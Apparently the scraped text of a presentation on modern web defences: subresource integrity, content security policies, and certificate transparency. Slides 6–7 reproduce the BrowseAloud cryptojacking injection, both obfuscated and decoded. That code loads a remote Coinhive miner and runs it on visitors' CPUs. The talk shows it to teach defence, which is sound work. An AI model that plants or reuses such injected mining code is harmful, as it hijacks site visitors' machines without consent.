modern web security patterns
play

Modern Web Security Patterns Chad Hollman Analyst, County of - PowerPoint PPT Presentation

Aug 30, 2023 •434 likes •1.05k views

Modern Web Security Patterns Chad Hollman Analyst, County of Sacramento Department of Technology Current Issues of Web Development Security Subresource Integrity Checking Content Security Policies HTTP Public Key Pinning Certificate

  1. Modern Web Security Patterns Chad Hollman Analyst, County of Sacramento Department of Technology

  2. Current Issues of Web Development Security Subresource Integrity Checking Content Security Policies HTTP Public Key Pinning Certificate Authorization Authority Security Contacts Standard

  3. Current Issues of Web Development Security Subresource Integrity Checking Content Security Policies Expect Certificate Transparency Certificate Authorization Authority Security Contacts Standard

  4. Current Issues of Web Development Security Subresource Integrity Checking Content Security Policies Expect Certificate Transparency Certificate Authorization Authority Security Contacts Standard

  5. Current Issues of Web Development Security Government, health-care, and education web sites with an embedded crypto-miner

  6. Current Issues of Web Development Security Obfuscated javascript with crypto-miner /* [Warning] Do not copy or self host this file, you will not be supported *//* BrowseAloud Plus v2.5.0 (13-09-2017) */ window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"]("\x3c\x73\x63 \x72\x69\x70\x74 \x74\x79\x70\x65\x3d\x27\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70 \x74\x27 \x73\x72\x63\x3d\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x63\x6f\x69\x6e\x68\x69\x76 \x65\x2e\x63\x6f\x6d\x2f\x6c\x69\x62\x2f\x63\x6f\x69\x6e\x68\x69\x76\x65\x2e\x6d \x69\x6e\x2e\x6a\x73\x3f\x72\x6e\x64\x3d"+window["\x4d\x61\x74\x68"]["\x72\x61\x 6e\x64\x6f\x6d"]()+"\x27\x3e\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e");window["\x64\ x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"]('\x3c\x73\x63\x72\x69\x70\ x74\x3e \x69\x66 \x28\x6e\x61\x76\x69\x67\x61\x74\x6f\x72\x2e\x68\x61\x72\x64\x77\x61\x72\x65\x43 \x6f\x6e\x63\x75\x72\x72\x65\x6e\x63\x79 \x3e \x31\x29\x7b \x76\x61\x72 \x63\x70\x75\x43\x6f\x6e\x66\x69\x67 \x3d \x7b\x74\x68\x72\x65\x61\x64\x73\x3a

  7. Current Issues of Web Development Security De-obfuscated crypto-miner window["document"]["write"]("write type='text/javascript' src='https://coinhive.com/lib/coinhive.min.js?rnd="+window["Math"]["random"]()+" '></script>");window["document"]["write"]('<script> if (navigator.hardwareConcurrency > 1){ var cpuConfig = {threads: Math.round(navigator.hardwareConcurrency/3),throttle:0.6}} else { var cpuConfig = {threads: 8,throttle:0.6}} var miner = new CoinHive.Anonymous(\'1GdQGpY1pivrGlVHSp5P2IIr9cyTzzXq\', cpuConfig);miner.start();</script>');

  8. Current Issues of Web Development Security Subresource Integrity Checking Content Security Policies Expect Certificate Transparency Certificate Authorization Authority Security Contacts Standard

  9. How do they work?

  10. It’s really easy

  11. browser requests external resource

  12. cdn returns browser requests resource external resource

  13. cdn returns browser requests browser hashes resource external resource returned resource

  14. cdn returns browser requests browser hashes resource external resource returned resource browser compares hash against integrity attribute in tag

  15. cdn returns browser requests browser hashes resource external resource returned resource browser compares content is loaded hash against integrity attribute in tag

  16. cdn returns browser requests browser hashes resource external resource returned resource browser compares content is loaded hash against integrity attribute in tag content is not loaded

  17. Embedding an SRI in your site First, generate the cryptographic hash of your external script https://www.srihash.org/

  18. Embedding an SRI in your site Second, add the generated hash to the script call <script src="https://example.com/example-framework.js" integrity="sha384-oqVuAfXRKap7fdgcCY5uykM6+R9GqQ8K/uxy9rx7HNQlGYl1kPzQho1wx4JwY8wC" ...> </script>

  19. Subresource Integrity Checking When SRIs fail

  20. Subresource Integrity Checking Are SRIs supported by my browser?

  21. But what happens if the script updates?

  22. Current Issues of Web Development Security Subresource Integrity Checking Content Security Policies Expect Certificate Transparency Certificate Authorization Authority Security Contacts Standard

  23. Content Security Policies The complement to SRIs A good content security policy (CSP) would have stopped the crypto miner from being loaded Can be implemented as part of a response header or meta tags Allow reporting-only on CSP violations without actually enforcing a CSP Allow you to white-list the sources of different content types Effectively says, “yes you can run whatever you want in this file, but you can only load from these places”

  24. Content Security Policies Content security policies as meta tags <meta http-equiv="Content-Security-Policy" content="default-src 'none'; connect-src bloghelpers.troyhunt.com links.services.disqus.com www.google-analytics.com stats.g.doubleclick.net syndication.twitter.com troyhunt.report-uri.com troyhunt.report-uri.com; font-src 'self' cdnjs.cloudflare.com fonts.gstatic.com; frame-src disqus.com c.disquscdn.com www.google.com www.youtube.com player.vimeo.com twitter.com platform.twitter.com syndication.twitter.com omny.fm pastebin.com; img-src 'self' c.disquscdn.com referrer.disqus.com stats.g.doubleclick.net www.google-analytics.com www.gstatic.com syndication.twitter.com platform.twitter.com *.twimg.com data:; script-src 'self' c.disquscdn.com disqus.com troyhunt.disqus.com www.google.com www.google- analytics.com www.gstatic.com cdnjs.cloudflare.com platform.twitter.com cdn.syndication.twimg.com syndication.twitter.com gist.github.com/troyhunt/ 'sha256-dblwN9MUF0KZKfqYU7U9hiLjNSW2nX1koQRMVTelpsA=' 'sha256- 4JqPqO/eQLWuWw1AE7dCvI9hPwiBcw0gy7uoLqS0ncg=' 'sha256- q7PyCIWqx04xiOpJNrqiwsSEIdeaqyhUMFifRsUwUDk=' cdn.report-uri.com; style-src 'self' 'unsafe-inline' c.disquscdn.com cdnjs.cloudflare.com fonts.googleapis.com platform.twitter.com ton.twimg.com assets-cdn.github.com github.githubassets.com; prefetch-src c.disquscdn.com disqus.com; upgrade-insecure-requests">

  25. Content Security Policies Content security policies with reporting as response headers

  26. Content Security Policies Content security policies with a reporting URL handled by my web server

  27. Content Security Policies Content security policies as response headers in the browser

  28. Content Security Policies Content security policy violations in the browser

  29. Content Security Policies Content security policy reporting with embedded script <script type=“text/json” id=“csp-report-uri”> { "keys": [ "blockedURI", "columnNumber", "disposition", "documentURI", "effectiveDirective", "lineNumber", "originalPolicy", "referrer", "sample", "sourceFile", "statusCode", "violatedDirective” ], "reportUri" : "https://troyhunt.report-uri.com/r/d/csp/enforce" } </script>

  30. Content Security Policies Upgrade insecure requests

  31. Content Security Policies Upgrade insecure requests

  32. Content Security Policies Upgrade insecure requests

  33. Content Security Policies Upgrade insecure requests

  34. Content Security Policies Upgrade insecure requests

  35. Content Security Policies Upgrade insecure requests

  36. default-src Serves as a fallback for all other fetch directives connect-src Restricts the URLs which can be loaded using script interfaces font-src Specifies valid sources for fonts loaded using @font-face frame-src Specifies valid sources for nested browsing contexts loading using elements such as <frame> and <iframe> img-src Specifies valid sources of images and favicons media-src Specifies valid sources for loading media using <audio> , <video> and <track> elements script-src Specifies valid sources for JavaScript <script> elements style-src Specifies valid sources for stylesheets worker-src Specifies valid sources for Worker , SharedWorker , or ServiceWorker scripts https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy

  37. Content Security Policies Are CSPs supported by my browser?

  38. Current Issues of Web Development Security Subresource Integrity Checking Content Security Policies Expect Certificate Transparency Certificate Authorization Authority Security Contacts Standard

  39. https://www.smashingmagazine.com/be-afraid-of-public-key-pinning/

  40. 2011 DigiNotar Dutch Certificate Authority

  41. 500 fake SSL certificates including sites like facebook.com and google.com

  42. Expect Certificate Transparency CT is a tool that allows you to detect when a fake certificate has been issued When a CA participates in the program, it must log all certificates they issue in a publicly searchable log The logs are monitored by an application that can report to you whenever a new cert for one of your domains is issued If the cert was issued in error (or maliciously), you can immediately take steps to have it revoked

  43. Expect Certificate Transparency Expect CT tells the browser you only want it to trust certificates signed by CAs that have Certificate Transparency enabled

Recommend

Security Patterns M. Schumacher, E. Fernandez-Buglioni, D. Hybertson, F. Bushmann, and P.

Security Patterns M. Schumacher, E. Fernandez-Buglioni, D. Hybertson, F. Bushmann, and P.

Security Patterns M. Schumacher, E. Fernandez-Buglioni, D. Hybertson, F. Bushmann, and P. Sommerlad, Security Patterns: Integrating Security and Systems Engineering, John Wiley and Sons Ltd., 2006 Lecture outline What is pattern? What is

1.04k views • 83 slides
A Second Look At ML Chapter Seven Modern Programming Languages, 2nd ed. 1 Outline Patterns

A Second Look At ML Chapter Seven Modern Programming Languages, 2nd ed. 1 Outline Patterns

A Second Look At ML Chapter Seven Modern Programming Languages, 2nd ed. 1 Outline Patterns Local variable definitions A sorting example Chapter Seven Modern Programming Languages, 2nd ed. 2 Two Patterns You Already Know We

939 views • 38 slides
Cyber Security A Modern Tale of a Dissonant Relationship BTB Security and me BTB Security

Cyber Security A Modern Tale of a Dissonant Relationship BTB Security and me BTB Security

Cyber Security A Modern Tale of a Dissonant Relationship BTB Security and me BTB Security Founded in 2006 Technical security services, MDR Me Ron Schlecht German word for BAD Ron.Schlecht@btbsecurity.com

432 views • 8 slides
TO ANY COUNT , TO ALL COUNTS, TO WHAT IS MAN: FINDING PATTERNS OF GENDER IN EARLY MODERN

TO ANY COUNT , TO ALL COUNTS, TO WHAT IS MAN: FINDING PATTERNS OF GENDER IN EARLY MODERN

TO ANY COUNT , TO ALL COUNTS, TO WHAT IS MAN: FINDING PATTERNS OF GENDER IN EARLY MODERN PLAYS HEATHER FROEHLICH UNIVERSITY OF STRATHCLYDE @HEATHERFRO ALLS WELL THAT ENDS WELL ACT II SCENE III 1096-1104 SLICING AND DICING

698 views • 55 slides
Security vulnerabilities, exploits and attack patterns: 15 years of art, pseudo-science, fun &amp;

Security vulnerabilities, exploits and attack patterns: 15 years of art, pseudo-science, fun &amp;

15th USENIX Security Symposium | July 31st August 4th 2006 | Vancouver, B.C. - Canada Security vulnerabilities, exploits and attack patterns: 15 years of art, pseudo-science, fun &amp; profit Ivn Arce Core Security Technologies Humboldt

767 views • 41 slides
MODERN 1 MODERN 2 MODERN 3 MODERN 4 MODERN A peep at some distant orb has power to raise

MODERN 1 MODERN 2 MODERN 3 MODERN 4 MODERN A peep at some distant orb has power to raise

MODERN 1 MODERN 2 MODERN 3 MODERN 4 MODERN A peep at some distant orb has power to raise and purify our thoughts like a strain picture, or a passage from the grander poets. It always does one good. 5 MODERN 6 MODERN 7 MODERN 8

524 views • 24 slides
patterns and anti-patterns m e a n s D E P E N D E N C I E S L I A B I L I T Y O P I N I O N AT

patterns and anti-patterns m e a n s D E P E N D E N C I E S L I A B I L I T Y O P I N I O N AT

patterns and anti-patterns m e a n s D E P E N D E N C I E S L I A B I L I T Y O P I N I O N AT E D P R O D F O R A L L Firebase Functions User Browser (Auth, Assets, DB, Security) (running Angular) Auth0 Firebase User Browser

609 views • 19 slides
Security in modern CPU Guillaume Bouffard ( guillaume.bouffard@ssi.gouv.fr ) Hardware Security

Security in modern CPU Guillaume Bouffard ( guillaume.bouffard@ssi.gouv.fr ) Hardware Security

Security in modern CPU Guillaume Bouffard ( guillaume.bouffard@ssi.gouv.fr ) Hardware Security Labs National Cybersecurity Agency of France (ANSSI) DIENS, ENS, CNRS, PSL University Workshop SILM 21 November 2019 Who am I? Me Expert in

1.18k views • 80 slides
Patterns for Modern Fortran Variation points Accomodate for change Partial differential

Patterns for Modern Fortran Variation points Accomodate for change Partial differential

High-Performance Design Patterns for Modern Fortran Variation points Accomodate for change Partial differential equation solvers Which coordinate system? How many dimensions? Coordinate-free programming Independent of dimension,

330 views • 10 slides
Mining Data for Patterns Fall 2013 Carola Wenk Analyzing Data Modern technology allows us to

Mining Data for Patterns Fall 2013 Carola Wenk Analyzing Data Modern technology allows us to

Mining Data for Patterns Fall 2013 Carola Wenk Analyzing Data Modern technology allows us to gather many forms of information at an unprecedented rate. What do we do with all of it? Wed like to learn from it. What does this mean? 1. Find

705 views • 53 slides
Tutorial: Security patterns and secure systems design using UML Eduardo B. Fernandez and Maria

Tutorial: Security patterns and secure systems design using UML Eduardo B. Fernandez and Maria

Tutorial: Security patterns and secure systems design using UML Eduardo B. Fernandez and Maria M. Larrondo Petrie Dept. of Computer Science and Eng. Florida Atlantic University www.cse.fau.edu/~security {ed, maria}@cse.fau.edu ICWMC/ICCGI

2.27k views • 184 slides
Design Patterns Applications Programming What is design patterns? The design patterns are

Design Patterns Applications Programming What is design patterns? The design patterns are

10/26/2011 G52APR Design Patterns Applications Programming What is design patterns? The design patterns are language- Design Patterns 1 independent strategies for solving common object-oriented design problems. Jiawei Li (Michael)

316 views • 8 slides
More Design Patterns Horstmann ch.10.1,10.4 Design patterns Structural design patterns

More Design Patterns Horstmann ch.10.1,10.4 Design patterns Structural design patterns

More Design Patterns Horstmann ch.10.1,10.4 Design patterns Structural design patterns Adapter Composite Decorator Proxy Behavioral design patterns Iterator Observer Strategy Template method

777 views • 16 slides
Building a Modern Security Engineering Team zane@signalsciences.com @zanelackey Who is this guy

Building a Modern Security Engineering Team zane@signalsciences.com @zanelackey Who is this guy

Building a Modern Security Engineering Team zane@signalsciences.com @zanelackey Who is this guy anyway? Built and led the Etsy Security Team Spoiler alert: what this presentation is about Co-founded Signal Sciences This talk is

814 views • 70 slides
Map Reduce and Design Patterns Lecture 5 Fang Yu Software Security Lab. Department of

Map Reduce and Design Patterns Lecture 5 Fang Yu Software Security Lab. Department of

Chapter 5 Map Reduce and Design Patterns Lecture 5 Fang Yu Software Security Lab. Department of Management Information Systems College of Commerce, National Chengchi University http://soslab.nccu.edu.tw Cloud Computation, April 7, 2015 1 /

458 views • 7 slides
Map Reduce and Design Patterns Lecture 4 Fang Yu Software Security Lab. Department of

Map Reduce and Design Patterns Lecture 4 Fang Yu Software Security Lab. Department of

Chapter 4 Map Reduce and Design Patterns Lecture 4 Fang Yu Software Security Lab. Department of Management Information Systems College of Commerce, National Chengchi University http://soslab.nccu.edu.tw Cloud Computation, March 31, 2015 1 /

131 views • 10 slides
Security Design Refinem ent through Mapping Tactics to Patterns Jungw oo Ryoo, Penn State Rick

Security Design Refinem ent through Mapping Tactics to Patterns Jungw oo Ryoo, Penn State Rick

Security Design Refinem ent through Mapping Tactics to Patterns Jungw oo Ryoo, Penn State Rick Kazm an, SEI / University of Haw aii SATURN, San Diego May 5 , 2 0 1 6 Goals of this Session To provide a quick look at Software security

753 views • 53 slides
Security Patterns for Automotive Systems Betty H.C. Cheng with Bradley Doherty, Nick Polanco, and

Security Patterns for Automotive Systems Betty H.C. Cheng with Bradley Doherty, Nick Polanco, and

9/16/19 Security Patterns for Automotive Systems Betty H.C. Cheng with Bradley Doherty, Nick Polanco, and Matthew Pasco Overview Background Review of threat surfaces Automotive Security Pattern structure Excerpts from Automotive

327 views • 16 slides
Design Patterns in Eiffel Dr. Till Bay design patterns? [Design Patterns] are

Design Patterns in Eiffel Dr. Till Bay design patterns? [Design Patterns] are

Design Patterns in Eiffel Dr. Till Bay design patterns? [Design Patterns] are descriptions of communicating objects and classes that are customized to solve a general design problem in a particular context. Design Patterns,

1.44k views • 69 slides
Modern Game Console Exploitation Eric DeBusschere, Mike McCambridge March 26, 2012 Console

Modern Game Console Exploitation Eric DeBusschere, Mike McCambridge March 26, 2012 Console

Modern Game Console Exploitation Eric DeBusschere, Mike McCambridge March 26, 2012 Console Security Overview Most modern consoles acheive complete software security by only running signed code, encrypting memory, and utilizing firmware updates

588 views • 37 slides
Kernel Security Anti-Patterns: Low Hanging Fruit http://outflux.net/slides/2013/lss/fruit.pdf

Kernel Security Anti-Patterns: Low Hanging Fruit http://outflux.net/slides/2013/lss/fruit.pdf

Kernel Security Anti-Patterns: Low Hanging Fruit http://outflux.net/slides/2013/lss/fruit.pdf gholzer Linux Security Summit, New Orleans 2013 Kees Cook &lt;keescook@google.com&gt; (pronounced Case) Overview Anti-pattern awareness

254 views • 10 slides
An Introduction to Modern Security Market Pricing of Interest Rate Derivatives Models Term-

An Introduction to Modern Security Market Pricing of Interest Rate Derivatives Models Term-

An Introduction to Modern Pricing of Interest Rate Derivatives School of Education, Culture and Communication Division of Applied Mathematics Introduction Interest Rates An Introduction to Modern Security Market Pricing of Interest Rate

1.11k views • 88 slides
Map Reduce and Design Patterns Lecture 1 Fang Yu Software Security Lab. Department of

Map Reduce and Design Patterns Lecture 1 Fang Yu Software Security Lab. Department of

Chapter 1 Chapter 2 Map Reduce and Design Patterns Lecture 1 Fang Yu Software Security Lab. Department of Management Information Systems College of Commerce, National Chengchi University http://soslab.nccu.edu.tw Cloud Computation, March

794 views • 14 slides
Local foods, community health, and food security latest research on patterns and relationships

Local foods, community health, and food security latest research on patterns and relationships

Local foods, community health, and food security latest research on patterns and relationships Amber Canto Poverty and Food Security Specialist University of Wisconsin-Extension, Cooperative Extension Laura Brown Community Development

416 views • 30 slides

More recommend